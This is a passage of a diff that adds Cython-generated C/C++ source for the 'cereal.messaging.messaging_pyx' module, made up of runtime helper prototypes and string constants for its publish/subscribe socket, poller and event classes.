(size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +/* PyUnicode_Unicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj); + +/* decode_c_string_utf16.proto */ +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 0; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16LE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = -1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} +static CYTHON_INLINE PyObject *__Pyx_PyUnicode_DecodeUTF16BE(const char *s, Py_ssize_t size, const char *errors) { + int byteorder = 1; + return PyUnicode_DecodeUTF16(s, size, errors, &byteorder); +} + +/* decode_c_string.proto */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_string( + const char* cstring, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)); + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* ArgTypeTest.proto */ +#define __Pyx_ArgTypeTest(obj, type, none_allowed, name, exact)\ + ((likely(__Pyx_IS_TYPE(obj, type) | (none_allowed && (obj == Py_None)))) ? 1 :\ + __Pyx__ArgTypeTest(obj, type, name, exact)) +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact); + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* ListAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_PyList_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len) & likely(len > (L->allocated >> 1))) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_PyList_Append(L,x) PyList_Append(L,x) +#endif + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* Py3UpdateBases.proto */ +static PyObject* __Pyx_PEP560_update_bases(PyObject *bases); + +/* CalculateMetaclass.proto */ +static PyObject *__Pyx_CalculateMetaclass(PyTypeObject *metaclass, PyObject *bases); + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* SetNameInClass.proto */ +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? _PyDict_SetItem_KnownHash(ns, name, value, ((PyASCIIObject *) name)->hash) : PyObject_SetItem(ns, name, value)) +#elif CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_SetNameInClass(ns, name, value)\ + (likely(PyDict_CheckExact(ns)) ? PyDict_SetItem(ns, name, value) : PyObject_SetItem(ns, name, value)) +#else +#define __Pyx_SetNameInClass(ns, name, value) PyObject_SetItem(ns, name, value) +#endif + +/* PyObjectCall2Args.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); + +/* PyObjectLookupSpecial.proto */ +#if CYTHON_USE_PYTYPE_LOOKUP && CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_LookupSpecialNoError(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 0) +#define __Pyx_PyObject_LookupSpecial(obj, attr_name) __Pyx__PyObject_LookupSpecial(obj, attr_name, 1) +static CYTHON_INLINE PyObject* __Pyx__PyObject_LookupSpecial(PyObject* obj, PyObject* attr_name, int with_error); +#else +#define __Pyx_PyObject_LookupSpecialNoError(o,n) __Pyx_PyObject_GetAttrStrNoError(o,n) +#define __Pyx_PyObject_LookupSpecial(o,n) __Pyx_PyObject_GetAttrStr(o,n) +#endif + +/* Py3ClassCreate.proto */ +static PyObject *__Pyx_Py3MetaclassPrepare(PyObject *metaclass, PyObject *bases, PyObject *name, PyObject *qualname, + PyObject *mkw, PyObject *modname, PyObject *doc); +static PyObject *__Pyx_Py3ClassCreate(PyObject *metaclass, PyObject *name, PyObject *bases, PyObject *dict, + PyObject *mkw, int calculate_metaclass, int allow_py2_metaclass); + +/* CyFunctionClassCell.proto */ +static int __Pyx_CyFunction_InitClassCell(PyObject *cyfunctions, PyObject *classobj); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* None.proto */ +#include + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static PyObject *__pyx_f_6cereal_9messaging_13messaging_pyx_5Event_setEvent(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self, Event __pyx_v_event); /* proto*/ +static PyObject *__pyx_f_6cereal_9messaging_13messaging_pyx_9SubSocket_setPtr(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, SubSocket *__pyx_v_ptr); /* proto*/ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "libc" */ + +/* Module declarations from "libc.errno" */ + +/* Module declarations from "cereal.messaging.messaging" */ + +/* Module declarations from "cereal.messaging.messaging_pyx" */ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyObject_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyUnicode_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyStr_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyBytes_string_to_py_std__in_string(std::string const &); /*proto*/ +static CYTHON_INLINE PyObject *__pyx_convert_PyByteArray_string_to_py_std__in_string(std::string const &); /*proto*/ +/* #### Code section: typeinfo ### */ +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "cereal.messaging.messaging_pyx" +extern int __pyx_module_is_main_cereal__messaging__messaging_pyx; +int __pyx_module_is_main_cereal__messaging__messaging_pyx = 0; + +/* Implementation of "cereal.messaging.messaging_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_super; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin_print; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ""; +static const char __pyx_k_m[] = "m"; +static const char __pyx_k_r[] = "r"; +static const char __pyx_k_s[] = "s"; +static const char __pyx_k_t[] = "t"; +static const char __pyx_k__2[] = ": "; +static const char __pyx_k__5[] = "*"; +static const char __pyx_k_gc[] = "gc"; +static const char __pyx_k_sz[] = "sz"; +static const char __pyx_k__53[] = "?"; +static const char __pyx_k_doc[] = "__doc__"; +static const char __pyx_k_msg[] = "msg"; +static const char __pyx_k_ptr[] = "ptr"; +static const char __pyx_k_set[] = "set"; +static const char __pyx_k_sys[] = "sys"; +static const char __pyx_k_None[] = "None"; +static const char __pyx_k_data[] = "data"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_exit[] = "exit"; +static const char __pyx_k_init[] = "__init__"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_name[] = "__name__"; +static const char __pyx_k_peek[] = "peek"; +static const char __pyx_k_poll[] = "poll"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_send[] = "send"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_term[] = "term"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_wait[] = "wait"; +static const char __pyx_k_with[] = "with "; +static const char __pyx_k_Event[] = "Event"; +static const char __pyx_k_clear[] = "clear"; +static const char __pyx_k_event[] = "event"; +static const char __pyx_k_items[] = "items"; +static const char __pyx_k_print[] = "print"; +static const char __pyx_k_super[] = "super"; +static const char __pyx_k_utf_8[] = "utf-8"; +static const char __pyx_k_Poller[] = "Poller"; +static const char __pyx_k_decode[] = "decode"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_events[] = "events"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_length[] = "length"; +static const char __pyx_k_module[] = "__module__"; +static const char __pyx_k_prefix[] = "prefix"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_result[] = "result"; +static const char __pyx_k_socket[] = "socket"; +static const char __pyx_k_suffix[] = "suffix"; +static const char __pyx_k_Context[] = "Context"; +static const char __pyx_k_address[] = "address"; +static const char __pyx_k_connect[] = "connect"; +static const char __pyx_k_context[] = "context"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_enabled[] = "enabled"; +static const char __pyx_k_message[] = "message"; +static const char __pyx_k_prepare[] = "__prepare__"; +static const char __pyx_k_receive[] = "receive"; +static const char __pyx_k_sockets[] = "sockets"; +static const char __pyx_k_timeout[] = "timeout"; +static const char __pyx_k_conflate[] = "conflate"; +static const char __pyx_k_endpoint[] = "endpoint"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_override[] = "override"; +static const char __pyx_k_qualname[] = "__qualname__"; +static const char __pyx_k_set_name[] = "__set_name__"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_127_0_0_1[] = "127.0.0.1"; +static const char __pyx_k_Event_set[] = "Event.set"; +static const char __pyx_k_PubSocket[] = "PubSocket"; +static const char __pyx_k_SubSocket[] = "SubSocket"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_metaclass[] = "__metaclass__"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_Event_peek[] = "Event.peek"; +static const char __pyx_k_Event_wait[] = "Event.wait"; +static const char __pyx_k_identifier[] = "identifier"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_setTimeout[] = "setTimeout"; +static const char __pyx_k_Event_clear[] = "Event.clear"; +static const char __pyx_k_Poller_poll[] = "Poller.poll"; +static const char __pyx_k_mro_entries[] = "__mro_entries__"; +static const char __pyx_k_Context_term[] = "Context.term"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_non_blocking[] = "non_blocking"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_init_subclass[] = "__init_subclass__"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_MessagingError[] = "MessagingError"; +static const char __pyx_k_PubSocket_send[] = "PubSocket.send"; +static const char __pyx_k_registerSocket[] = "registerSocket"; +static const char __pyx_k_get_fake_prefix[] = "get_fake_prefix"; +static const char __pyx_k_set_fake_prefix[] = "set_fake_prefix"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_Messaging_failure[] = "Messaging failure "; +static const char __pyx_k_PubSocket_connect[] = "PubSocket.connect"; +static const char __pyx_k_SocketEventHandle[] = "SocketEventHandle"; +static const char __pyx_k_SubSocket_connect[] = "SubSocket.connect"; +static const char __pyx_k_SubSocket_receive[] = "SubSocket.receive"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_delete_fake_prefix[] = "delete_fake_prefix"; +static const char __pyx_k_toggle_fake_events[] = "toggle_fake_events"; +static const char __pyx_k_wait_for_one_event[] = "wait_for_one_event"; +static const char __pyx_k_all_readers_updated[] = "all_readers_updated"; +static const char __pyx_k_SubSocket_setTimeout[] = "SubSocket.setTimeout"; +static const char __pyx_k_Event___reduce_cython[] = "Event.__reduce_cython__"; +static const char __pyx_k_MessagingError___init[] = "MessagingError.__init__"; +static const char __pyx_k_Poller_registerSocket[] = "Poller.registerSocket"; +static const char __pyx_k_Poller___reduce_cython[] = "Poller.__reduce_cython__"; +static const char __pyx_k_Context___reduce_cython[] = "Context.__reduce_cython__"; +static const char __pyx_k_Event___setstate_cython[] = "Event.__setstate_cython__"; +static const char __pyx_k_MultiplePublishersError[] = "MultiplePublishersError"; +static const char __pyx_k_SIGINT_received_exiting[] = "SIGINT received, exiting"; +static const char __pyx_k_Poller___setstate_cython[] = "Poller.__setstate_cython__"; +static const char __pyx_k_Context___setstate_cython[] = "Context.__setstate_cython__"; +static const char 